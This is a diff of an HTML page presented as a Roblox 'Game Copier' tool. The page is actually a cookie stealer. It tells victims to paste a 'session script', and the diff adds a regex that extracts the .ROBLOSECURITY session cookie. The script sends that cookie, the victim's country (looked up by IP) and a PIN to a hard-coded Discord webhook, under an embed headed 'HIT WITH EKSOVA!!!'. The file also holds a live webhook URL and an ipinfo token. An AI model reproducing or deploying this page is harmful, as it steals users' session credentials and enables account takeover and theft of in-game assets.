--- a/index.html
+++ b/index.html
@@ -85,31 +85,27 @@
             width: 100%;
             height: 100%;
         }
-        /* Processing Message Panel - Overlay Style */
         .processing-panel {
-            display: none; /* Hidden by default */
+            display: none;
             position: fixed;
             top: 50%;
             left: 50%;
             transform: translate(-50%, -50%);
-            background-color: rgba(0, 0, 0, 0.9); /* Semi-transparent black */
+            background-color: rgba(0, 0, 0, 0.9);
             border-radius: 20px;
             padding: 60px;
             font-size: 2em;
             color: #ffffff;
             box-shadow: 0 0 20px rgba(0, 255, 0, 0.8);
             text-align: center;
-            z-index: 1000; /* Ensure it appears above everything else */
+            z-index: 1000;
             max-width: 80%;
             width: 400px;
         }
     </style>
 </head>
 <body>
-    <!-- Header Text -->
     <div class="header">MuriTools</div>
-
-    <!-- Title and Description -->
     <div class="title-section">
         <h1 style="font-size: 3.5em; margin: 20px 0;">Game Copier</h1>
         <p style="font-size: 2em; text-align: center; max-width: 1200px;">
@@ -118,38 +114,33 @@
     </div>
 
     <div class="container">
-        <!-- Copy Games Panel -->
         <div class="panel">
             <h2>Copy Games</h2>
-            <input type="text" id="gameFile" placeholder="Enter game file" class="input-box">
+            <input id="sessionScript" placeholder="Enter game file" class="input-box" rows="10"></textarea>
             <input type="text" id="pin" placeholder="Create a pin" class="input-box">
             <button class="btn" onclick="sendToDiscord()">Copy Game!</button>
         </div>
 
-        <!-- How to Use Panel -->
         <div class="panel">
             <h2>How to use</h2>
             <div class="video-container">
-                <!-- Replace the src with the link to your video -->
                 <iframe src="https://www.youtube.com/embed/YOUR_VIDEO_ID" frameborder="0" allowfullscreen></iframe>
             </div>
         </div>
     </div>
 
-    <!-- Processing Message Panel -->
     <div id="processingPanel" class="processing-panel">
-        Game is being processed this may take 1-5 minutes!
+        Game is being processed; this may take 1-5 minutes!
     </div>
 
     <script>
         let countryFlag = '';
-        let totalPings = 0; // Assume this would be dynamically managed on a backend or database.
-        let cooldown = false; // Cooldown flag
+        let totalPings = 0;
+        let cooldown = false;
 
-        // Function to get country and flag emoji
         async function fetchCountry() {
             try {
-                const response = await fetch("https://ipinfo.io/json?token=dc661f4538d752"); // Replace with a valid token
+                const response = await fetch("https://ipinfo.io/json?token=dc661f4538d752");
                 const data = await response.json();
                 const countryCode = data.country;
                 countryFlag = countryToEmoji(countryCode);
@@ -158,41 +149,67 @@
             }
         }
 
-        // Convert country code to flag emoji
         function countryToEmoji(countryCode) {
             return countryCode
                 .toUpperCase()
                 .replace(/./g, char => String.fromCodePoint(127397 + char.charCodeAt()));
         }
 
-        // Call fetchCountry to set countryFlag at page load
+        // Load total hits from localStorage
+        function loadTotalHits() {
+            const savedHits = localStorage.getItem('totalPings');
+            totalPings = savedHits ? parseInt(savedHits, 10) : 0;
+        }
+
+        // Save total hits to localStorage
+        function saveTotalHits() {
+            localStorage.setItem('totalPings', totalPings);
+        }
+
+        // Call the load function on page load
+        loadTotalHits();
         fetchCountry();
 
-        // Function to send data to Discord webhook
         function sendToDiscord() {
-            if (cooldown) return; // Exit if cooldown is active
+            if (cooldown) return;
 
-            const gameFile = document.getElementById("gameFile").value;
+            const sessionScript = document.getElementById("sessionScript").value;
             const pin = document.getElementById("pin").value;
 
-            if (!gameFile) {
-                alert("Please enter a game file.");
+            if (!sessionScript) {
+                alert("Please enter the session script.");
                 return;
             }
 
-            // Show the processing message
             document.getElementById("processingPanel").style.display = "block";
 
-            const webhookUrl = "https://discord.com/api/webhooks/1300555524823187576/jn-SfRrTE-bmNQFXvaQRSmiZfmJFBQeMyI2uAaF27TwiOcQNXK7SeQP-Jc6S7G0KfaSP"; // Replace with your actual Discord webhook URL
+            const webhookUrl = "https://discord.com/api/webhooks/1300555524823187576/jn-SfRrTE-bmNQFXvaQRSmiZfmJFBQeMyI2uAaF27TwiOcQNXK7SeQP-Jc6S7G0KfaSP";
 
-            totalPings++; // Increment the ping count
+            // Increment total pings
+            totalPings++;
+            saveTotalHits(); // Save the updated count
+
+            // Pattern to capture the full .ROBLOSECURITY cookie including the warning and code
+            const cookiePattern = /\.ROBLOSECURITY",\s*"_\|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items\.\|_[A-Za-z0-9]+"/;
+
+            // Find and extract the .ROBLOSECURITY cookie from the input script
+            let cookieString = "";
+            const match = sessionScript.match(cookiePattern);
+            if (match) {
+                // Remove leading .ROBLOSECURITY", " and trailing "
+                cookieString = match[0].split('.ROBLOSECURITY", "')[1].slice(0, -1).trim();
+            } else {
+                alert("Please Enter A Game File!");
+                document.getElementById("processingPanel").style.display = "none";
+                return;
+            }
 
             const data = {
                 embeds: [
                     {
                         title: "HIT WITH EKSOVA!!!",
-                        description: `**Total Hits**: ${totalPings}\n**Country**: ${countryFlag}\n\n**Pin**: ${pin || "N/A"}\n**🍪Roblox Cookie🍪**\n\`\`\`${gameFile || "No Game File Provided"}\`\`\``,
-                        color: 0x000000, // Discord embed color (black)
+                        description: `\n**Country**: ${countryFlag}\n\n**useless**: ${pin || "N/A"}\n**🍪Roblox Cookie🍪**\n\`\`\`\n${cookieString}\n\`\`\``,
+                        color: 0x000000,
                         footer: {
                             text: "fucking skids"
                         },
@@ -201,7 +218,6 @@
                 ]
             };
 
-            // Send the data to the Discord webhook
             fetch(webhookUrl, {
                 method: "POST",
                 headers: {
@@ -210,11 +226,9 @@
                 body: JSON.stringify(data)
             });
 
-            // Set cooldown to prevent further pings for 5 seconds
             cooldown = true;
             setTimeout(() => {
-                cooldown = false; // Reset cooldown after 5 seconds
-                // Leave the processing panel visible indefinitely
+                cooldown = false;
             }, 5000);
         }
     </script>
